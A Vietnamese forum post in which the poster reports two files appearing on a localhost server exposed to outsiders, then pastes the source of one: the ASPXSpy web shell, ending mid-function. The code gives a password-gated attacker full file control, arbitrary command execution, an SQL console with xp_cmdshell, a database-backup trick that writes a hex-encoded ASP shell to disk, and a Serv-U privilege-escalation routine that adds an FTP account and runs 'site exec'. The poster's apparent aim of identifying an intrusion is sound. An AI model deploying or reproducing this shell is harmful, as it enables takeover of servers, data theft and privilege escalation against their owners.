Hỏi về: Mình có làm server localhost sau khi cho người ngoài truy cập vào thì xuất hiện 2
FIle1

/*
Thanks Snailsor,FuYu,BloodSword
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : [email protected]
*/
public string Password="21232f297a57a5a743894a0e4a801fc3";
public string SessionName="ASPXSpy";
public string cookiePass="ASPXSpyCookiePass";
public string Bin_Action="";
public string Bin_Request="";
protected OleDbConnection conn=new OleDbConnection();
protected OleDbCommand comm=new OleDbCommand();
protected void Page_Load(object sender, EventArgs e)
{
//string strkey;
bool isCookied=false;
HttpCookieCollection cookiecoll=Request.Cookies;
foreach (string strkey in cookiecoll.AllKeys)
{
if (strkey==cookiePass)
{
if (cookiecoll[strkey].Value==Password)
{
isCookied=true;
}
break;
}
}
if((Session[SessionName] !="BIN")&&(!isCookied))
{
Bin_login();
}
else
{
if(!IsPostBack)
{
Bin_main();
}
else
{
Bin_Action=Request["goaction"];
if(Bin_Action=="del")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 1);
}
if(Bin_Action=="change")
{
Bin_Request=Request["todo"];
Bin_FileList(Bin_Request);
}
if(Bin_Action=="deldir")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 2);
}
if(Bin_Action=="down")
{
Bin_Request=Request["todo"];
Bin_Filedown(Bin_Request);
}
if(Bin_Action=="rename")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 1);
}
if(Bin_Action=="renamedir")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 2);
}
if(Bin_Action=="showatt")
{
Bin_Request=Request["todo"];
Bin_Fileatt(Bin_Request);
}
if(Bin_Action=="edit")
{
Bin_Request=Request["todo"];
Bin_FileEdit(Bin_Request);
}
if(Bin_Action=="postdata")
{
Bin_Request=Request["todo"];
Session["Bin_Table"]=Bin_Request;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DBstrTextBox.Text="";
Bin_Databind();
}
if(Bin_Action=="changedata")
{
Session["Bin_Table"]=null;
Bin_Request=Request["todo"];
Session["Bin_Option"]=Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_DBstrTextBox.Text=Bin_Request;
}
if(Session["Bin_Table"] !=null)
{
Bin_Databind();
}
}
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=false;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}
public void Bin_main()
{
TimeLabel.Text=DateTime.Now.ToString();
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=true;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
string ServerIP="Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"
";
string HostName="HostName : "+Environment.MachineName+"
";
string OS="OS Version : "+Environment.OSVersion+"";
string IISversion="IIS Version : "+Request.ServerVariables["SERVER_SOFTWARE"]+"
";
string PATH_INFO="PATH_TRANSLATED : "+Request.ServerVariables["PATH_TRANSLATED"]+"
";
InfoLabel.Text="SYS-INFO";
InfoLabel.Text+=ServerIP+HostName+OS+IISversion+PATH_INFO+"";
InfoLabel.Text+=Bin_Process()+"";
}
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg=new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo="";
string iisstart="";
string iisend="";
string iisstr="IIS://localhost/W3SVC";
int i=0;
try
{
DirectoryEntry mydir=new DirectoryEntry(iisstr);
iisstart="OrderIIS_USERDomainPath";
foreach(DirectoryEntry child in mydir.Children)
{
if(CheckIsNumber(child.Name.ToString()))
{
string dirstr=child.Name.ToString();
string tmpstr="";
DirectoryEntry newdir=new DirectoryEntry(iisstr+"/"+dirstr);
DirectoryEntry newdir1=newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo+=""+(i=i+1)+"";
iisinfo+=""+newdir1.Properties["AnonymousUserName"].Value+"";
iisinfo+=""+child.Properties["ServerBindings"][0]+"";
iisinfo+=""+newdir1.Properties["Path"].Value+"";
iisinfo+="";
}
}
iisend="";
}
catch(Exception error)
{
Bin_Error(error.Message);
}
return iisstart+iisinfo+iisend;
}
public string Bin_Process()
{
string htmlstr="PROCESS-INFOIDProcessMemorySizeThreads";
string prostr="";
string htmlend="";
try
{
Process[] myprocess=Process.GetProcesses();
foreach(Process p in myprocess)
{
prostr+=""+p.Id.ToString()+"";
prostr+=""+p.ProcessName.ToString()+"";
prostr+=""+p.WorkingSet.ToString()+"";
prostr+=""+p.Threads.Count.ToString()+"";
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr+prostr+htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass=FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if(MD5Pass==Password)
{
Session[SessionName]="BIN";
Response.Cookies.Add(new HttpCookie(cookiePass,Password));
Bin_main();
}
else
{
Bin_login();
}
}
protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(cookiePass,null));
Bin_login();
}
protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_FilePanel.Visible=true;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text=formatpath(Server.MapPath("."));
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath("."));
}
protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file="";
file+="Drives : ";
string[] drivers=Directory.GetLogicalDrives();
for(int i=0; i < drivers.Length; i++)
{
file+=""+drivers+" ";
}
file+=" WebRoot : "+Server.MapPath(".")+"";
Bin_FileLabel.Text=file;
}
public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible=true;
Bin_CreateTextBox.Text="";
Bin_CopytoTextBox.Text="";
Bin_CopyTextBox.Text=Bin_path;
Bin_upTextBox.Text=Bin_path;
Bin_IISPanel.Visible=false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist=Bin_FilelistLabel.Text;
Bin_Filelist="";
Bin_Filelist+="";
Bin_Filelist+="NameSize(Byte)";
Bin_Filelist+="ModifyTimeOperate";
try
{
Bin_Filelist+="";
string parstr="";
if(Bin_path.Length < 4)
{
parstr=formatpath(Bin_path);
}
else
{
parstr= formatpath(Directory.GetParent(Bin_path).ToString());
}
Bin_Filelist+="|Parent Directory|";
Bin_Filelist+="";
DirectoryInfo Bin_dir=new DirectoryInfo(Bin_path);
foreach(DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername=formatpath(Bin_path)+"/"+formatfile(Bin_folder.Name);
tmpstr+="";
tmpstr+=""+Bin_folder.Name+"<dir>"+Directory.GetLastWriteTime(Bin_path+"/"+Bin_folder.Name)+"Ren|Att|Del";
tmpstr+="";
}
foreach(FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename=formatpath(Bin_path)+"/"+formatfile(Bin_file.Name);
tmpstr+="";
tmpstr+=""+Bin_file.Name+""+Bin_file.Length+""+Directory.GetLastWriteTime(Bin_path+"/"+Bin_file.Name)+"Edit|Ren|Down|Att|Del";
tmpstr+="";
}
tmpstr+="";
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FilelistLabel.Text=Bin_Filelist+tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if(type==1)
{
File.Delete(instr);
}
if(type==2)
{
foreach(string tmp in Directory.GetFileSystemEntries(instr))
{
if(File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, 2);
}
}
Directory.Delete(instr);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if(type==1)
{
string[] array=instr.Split(',');
File.Move(array[0], array[1]);
}
if(type==2)
{
string[] array=instr.Split(',');
Directory.Move(array[0], array[1]);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream=new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize=MyFileStream.Length;
byte[] Buffer=new byte[(int)FileSize];
MyFileStream.Read(Buffer, 0,(int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename="+instr);
Response.Charset="UTF-8";
Response.ContentType="application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible=true;
Bin_FilePanel.Visible=true;
try
{
string Att=File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked=false;
Bin_SystemCheckBox.Checked=false;
Bin_HiddenCheckBox.Checked=false;
Bin_ArchiveCheckBox.Checked=false;
if(Att.LastIndexOf("ReadOnly")!=-1)
{
Bin_ReadOnlyCheckBox.Checked=true;
}
if(Att.LastIndexOf("System")!=-1)
{
Bin_SystemCheckBox.Checked=true;
}
if(Att.LastIndexOf("Hidden")!=-1)
{
Bin_HiddenCheckBox.Checked=true;
}
if(Att.LastIndexOf("Archive")!=-1)
{
Bin_ArchiveCheckBox.Checked=true;
}
Bin_CreationTimeTextBox.Text=File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text=File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text=File.GetLastAccessTime(instr).ToString();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text=instr;
Session["FileName"]=instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible=true;
Bin_EditPanel.Visible=true;
Bin_DriveList();
Bin_EditpathTextBox.Text=instr;
StreamReader SR=new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text=SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{
string uppath=Bin_upTextBox.Text;
if(uppath.Substring(uppath.Length - 1, 1)!=@"/")
{
uppath=uppath+@"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath+Path.GetFileName(Bin_UpFile.Value));
}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text="Error : "+error;
}
public string formatpath(string instr)
{
instr=instr.Replace(@"", "/");
if(instr.Length < 4)
{
instr=instr.Replace(@"/", "");
}
if(instr.Length==2)
{
instr=instr+@"/";
}
instr=instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr=instr.Replace(" ", "%20");
return instr;
}
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile=Bin_CreateTextBox.Text;
string filepath=Bin_upTextBox.Text;
filepath=filepath+"/"+newfile;
try
{
StreamWriter sw=new StreamWriter(filepath, true, Encoding.Default);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath=Bin_upTextBox.Text;
string newdir=Bin_CreateTextBox.Text;
newdir=dirpath+"/"+newdir;
try
{
Directory.CreateDirectory(newdir);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName=Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if(Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
}
if(Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.System);
}
if(Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Hidden);
}
if(Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Archive);
}
if(FileName.Substring(FileName.Length - 1, 1)=="/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");
}
protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW=new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");
}
protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=true;
Bin_SQLPanel.Visible=false;
Bin_CmdLabel.Text="";
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}
protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro=new Process();
Cmdpro.StartInfo.FileName=Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments=Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute=false;
Cmdpro.StartInfo.RedirectStandardInput=true;
Cmdpro.StartInfo.RedirectStandardOutput=true;
Cmdpro.StartInfo.RedirectStandardError=true;
Cmdpro.Start();
string cmdstr=Cmdpro.StandardOutput.ReadToEnd();
cmdstr=cmdstr.Replace("", ">");
Bin_CmdLabel.Text=""+cmdstr+"
";
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}
protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked=true;
Bin_AccRadioButton.Checked=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text=@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked=false;
Bin_AccRadioButton.Checked=true;
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void OpenConnection()
{
if(conn.State==ConnectionState.Closed)
{
try
{
conn.ConnectionString=Bin_SQLconnTextBox.Text;
comm.Connection=conn;
conn.Open();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if(conn.State==ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da=new OleDbDataAdapter();
DataTable datatable=new DataTable();
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=sqlstr;
da.SelectCommand=comm;
da.Fill(datatable);
}
catch(Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"]=null;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DataGrid.AllowPaging=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
Bin_DBinfoLabel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;
OpenConnection();
DataTable ver=Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs=Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb=Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol=Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner=Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo="";
if(owner.Rows[0][0].ToString()=="1")
{
dbo="db_owner";
}
else
{
dbo="public";
}
if(rol.Rows[0][0].ToString()=="1")
{
dbo="sa";
}
string db_info="";
db_info="SQLversion : "+ver.Rows[0][0].ToString()+"
";
string db_name="";
for(int i=0; i < dbs.Rows.Count; i++)
{
db_name+=dbs.Rows[0].ToString().Replace(cdb.Rows[0][0].ToString(), ""+cdb.Rows[0][0].ToString()+"")+" | ";
}
db_info+="DataBase : "+db_name+"
";
db_info+="SRVROLEMEMBER : "+dbo+"";
Bin_DBinfoLabel.Text=db_info;
}
if(Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible=false;
Bin_SAexecButton.Visible=false;
Bin_Accbind();
}
}
catch(Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=true;
OpenConnection();
DataTable acctable=new DataTable();
acctable=conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr="";
accstr+="Tables Count : "+acctable.Rows.Count+"
Please select a database : ";
for(int i=0; i < acctable.Rows.Count; i++)
{
accstr+=""+acctable.Rows.ItemArray[2].ToString()+"";
}
if(Session["Bin_Table"] !=null)
{
accstr+=""+Session["Bin_Table"]+"";
}
accstr+="";
Bin_AccinfoLabel.Text=accstr;
CloseConnection();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible=false;
Bin_Accbind();
Bin_Scroll.Visible=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
Bin_DBinfoLabel.Visible=false;
}
Bin_DataGrid.Visible=true;
DataTable databind=Bin_DataTable(@"SELECT * FROM "+Session["Bin_Table"]);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=instr;
comm.ExecuteNonQuery();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{
for(int i=2; i < e.Item.Cells.Count; i++)
{
e.Item.Cells.Text=e.Item.Cells.Text.Replace("", ">");
}
}
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex=e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if(e.CommandName=="Cancel")
{
Bin_DataGrid.EditItemIndex=-1;
Bin_Databind();
}
}
protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Scroll.Visible=true;
Bin_DataGrid.Visible=true;
Bin_DataGrid.AllowPaging=true;
Bin_Accbind();
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
}
string sqlstr=Bin_DBstrTextBox.Text;
sqlstr=sqlstr.TrimStart().ToLower();
if(sqlstr.Substring(0, 6)=="select")
{
DataTable databind=Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_Accbind();
Bin_DBmenuPanel.Visible=true;
Bin_DataGrid.Visible=false;
Bin_DataGrid.AllowPaging=true;
Bin_Scroll.Visible=false;
Bin_DBstrTextBox.Text="";
Bin_SAexecButton.Visible=false;
Bin_ResLabel.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_SAexecButton.Visible=true;
Bin_Change();
Bin_ExecButton.Visible=false;
Bin_ResLabel.Visible=false;
Session["Bin_Option"]=null;
Bin_dirPanel.Visible=false;
}
public void Bin_Change()
{
Bin_ExecButton.Visible=false;
string select="SQL Server ExecAdd sp_oacreateAdd xp_cmdshellAdd xp_cmdshellAdd xp_cmdshell(SQL2005)XP_cmdshell execSP_oamethod execSP_makewebtask make file";
if(Session["Bin_Option"] !=null)
{
select+=""+Session["Bin_Option"]+"";
}
select+="";
Bin_AccinfoLabel.Text=select;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}
protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_ExecButton.Visible=false;
Bin_Scroll.Visible=false;
Bin_DataGrid.Visible=false;
Bin_DBmenuPanel.Visible=true;
string sqlstr=Bin_DBstrTextBox.Text;
DataTable databind=Bin_DataTable(sqlstr);
string res="";
foreach(DataRow dr in databind.Rows)
{
for(int i=0; i < databind.Columns.Count; i++)
{
res+=dr+"\r";
}
}
Bin_ResLabel.Text="
";
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}
protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible=true;
Bin_Scroll.Visible=true;
Bin_DataGrid.AllowPaging=false;
string exesql="use pubs;if exists(select * from sysobjects where id=object_id(N'[bin_dir]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400))INSERT bin_dir EXEC MASTER..XP_dirtree '"+Bin_DirTextBox.Text+"',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir=Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource=sql_dir;
Bin_DataGrid.DataBind();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}
protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=true;
Bin_IISPanel.Visible=false;
Bin_SuresLabel.Text="";
Bin_LoginPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}
protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakLog();
}
protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result="";
string user=Bin_SunameTextBox.Text;
string pass=Bin_SupassTextBox.Text;
int port=Int32.Parse(Bin_SuportTextBox.Text);
string cmd=Bin_SucmdTextBox.Text;
string loginuser="user "+user+"\r\n";
string loginpass="pass "+pass+"\r\n";
string site="SITE MAINTENANCE\r\n";
string deldomain="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite="QUIT\r\n";
try
{
TcpClient tcp=new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize=1024;
NetworkStream NS=tcp.GetStream();
Result=Rev(NS);
Result+=Send(NS, loginuser);
Result+=Rev(NS);
Result+=Send(NS, loginpass);
Result+=Rev(NS);
Result+=Send(NS, site);
Result+=Rev(NS);
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, setdomain);
Result+=Rev(NS);
Result+=Send(NS, newdomain);
Result+=Rev(NS);
TcpClient tcp1=new TcpClient("127.0.0.1", 52521);
NetworkStream NS1=tcp1.GetStream();
Result+=Rev(NS1);
Result+=Send(NS1, "user bin\r\n");
Result+=Rev(NS1);
Result+=Send(NS1, "pass binftp\r\n");
Result+=Rev(NS1);
Result+=Send(NS1, "site exec "+cmd+"\r\n");
Result+=Rev(NS1);
tcp1.Close();
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, quite);
